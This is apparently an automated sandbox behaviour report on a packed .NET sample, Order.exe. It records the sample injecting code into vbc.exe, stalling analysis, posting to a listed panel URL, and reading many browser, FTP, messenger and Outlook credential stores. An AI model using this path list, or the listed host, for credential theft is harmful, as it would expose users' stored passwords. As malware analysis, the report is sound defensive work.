- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
- key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Harvests information related to installed instant messenger clients
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local FTP client softwares
Severity: High
Confidence: Very High
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
- file: C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
- file: C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
- file: C:\Program Files (x86)\FTPGetter\Profile\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
- file: C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
- key: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
- key: HKEY_CURRENT_USER\Software\Ghisler\Total Commander
- key: HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: services.exe (484) called API GetSystemTimeAsFileTime 208123 times
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: Order.exe(2380) -> vbc.exe(2744)
Anomalous .NET characteristics
Severity: Medium
Confidence: Very High
- anomalous_version: Assembly version is set to 0
The binary likely contains encrypted or compressed data.
Severity: Medium
Confidence: Very High
- section: name: .text, entropy: 7.60, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00025400, virtual_size: 0x00025244
- section: name: .rsrc, entropy: 7.42, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00026c00, virtual_size: 0x00026af0
Performs some HTTP requests
Severity: Medium
Confidence: Low
- url: http://abatii.web.id/smart/Panel/five/fre.php
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- post_no_referer: HTTP traffic contains a POST request with no referer header
- http_version_old: HTTP traffic uses version 1.0
- suspicious_request: http://abatii.web.id/smart/Panel/five/fre.php
At least one IP Address, Domain, or File Name was found in a crypto call
Severity: Medium
Confidence: Very High
- ioc: -6.207693E
- ioc: -1.929752E-05F
- ioc: -1.435897E
- ioc: 92669.03
- ioc: 1.919955E
- ioc: 49108.78
- ioc: 1.716835E-06F
- ioc: 1.0.0.0
- ioc: pplication.app
- ioc: asm.v2
Creates RWX memory
Severity: Medium
Confidence: Medium
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-06-30 16:55:30 | 2018-06-30 16:58:41 | 191 |
11 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\Order.exe.config C:\Users\Seven01\AppData\Local\Temp\Order.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll C:\Windows\System32\MSVCR120_CLR0400.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac C:\Windows\Globalization\Sorting\sortdefault.nls C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\* C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll \Device\KsecDD C:\Windows\assembly\NativeImages_v4.0.30319_32\28C66gEdfyuxjXKM\* C:\Users\Seven01\AppData\Local\Temp\Order.INI C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp C:\Windows\assembly\pubpol23.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.tmp C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.0.cs C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.dll C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.out C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.err C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.pdb C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux C:\Users\Seven01\AppData\Local\Temp\Order.exe.Local\ C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80 C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\assembly\GAC_64 C:\Windows\assembly\GAC_64\mscorlib.resources C:\Windows\assembly\GAC_32 C:\Windows\assembly\GAC_32\mscorlib.resources C:\Windows\assembly\GAC_MSIL C:\Windows\assembly\GAC_MSIL\mscorlib.resources C:\Windows\assembly\GAC_MSIL\mscorlib.resources\* C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC C:\Windows\assembly\GAC\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_64 C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_32 C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC_MSIL C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources C:\Windows\Microsoft.Net\assembly\GAC C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\* C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\* C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll C:\Windows\System32\mscoree.dll.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\System.Management.dll C:\Windows C:\Windows\Microsoft.NET C:\Windows\Microsoft.NET\Framework C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll C:\Users\Seven01\AppData\Local\Temp\System.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll C:\Users\Seven01\AppData\Local\Temp\System.Core.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll C:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp C:\Windows\System32\tzres.dll C:\Program Files\NETGATE\Black Hawk C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE} C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalNichrome\Login Data C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalRockMelt\Login Data C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSpark\Login Data C:\Users\Seven01\AppData\LocalSpark\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalChromium\Login Data C:\Users\Seven01\AppData\LocalChromium\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTitan Browser\Login Data C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTorch\Login Data C:\Users\Seven01\AppData\LocalTorch\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalVivaldi\Login Data C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSuperbird\Login Data C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMustang Browser\Login Data C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalOrbitum\Login Data C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalIridium\Login Data C:\Users\Seven01\AppData\LocalIridium\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db C:\Users\Seven01\AppData\Roaming\Opera C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml C:\Users\Seven01\Documents\SuperPutty C:\Program Files (x86)\FTPShell\ftpshell.fsi C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites C:\Program Files (x86)\FTP Now\sites.xml 